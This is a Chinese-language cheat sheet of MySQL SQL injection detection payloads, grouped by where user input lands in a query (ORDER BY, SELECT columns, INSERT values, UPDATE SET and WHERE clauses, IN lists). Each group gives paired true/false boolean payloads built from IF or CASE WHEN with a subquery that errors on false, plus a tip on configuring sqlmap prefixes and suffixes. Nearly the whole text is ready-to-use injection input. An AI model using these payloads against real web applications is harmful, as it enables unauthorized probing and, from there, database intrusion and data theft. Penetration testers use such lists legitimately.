整理的mysql各种位置sql注入基本检测语句

order by xx {sql} :
,if((1=1),1,(select 1 union select 2))
,if((1=2),1,(select 1 union select 2))

工具的话可以sqlmap设置前缀
,if((1=1
设置后缀
),1,(select 1 union select 2))

=======================================================

select xxx( as x) {sql} from xx :

,case when(1=1)then 1 else (select 1 union select 2) end
,case when(1=2)then 1 else (select 1 union select 2) end

=======================================================

select * from xxx order by {sql} :

(case when(1=1) then 1 else (select 1 union select 2) end)
(case when(1=2) then 1 else (select 1 union select 2) end)

or
已存在字段,if((1=1),1,(select 1 union select 2))
已存在字段,if((1=2),1,(select 1 union select 2))

=======================================================

insert into person (number,name) values (1,'{sql}') :

'+(if((1=1),1,(select 1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'

or
'+(case when(1=1) then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'

=======================================================

update xxx set x='{sql}' :

'+(if((1=1),1,(select 1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'

or
'+(case when(1=1) then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'

=======================================================

update xxx set x=x where xx ='{sql}' :

'+(case when(1=1) then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'

=======================================================

select * from xxx where x in (‘xx’,’{sql}’) :

'+if((1=1),1,(select 1 union select 2))+'
'+if((1=2),1,(select 1 union select 2))+'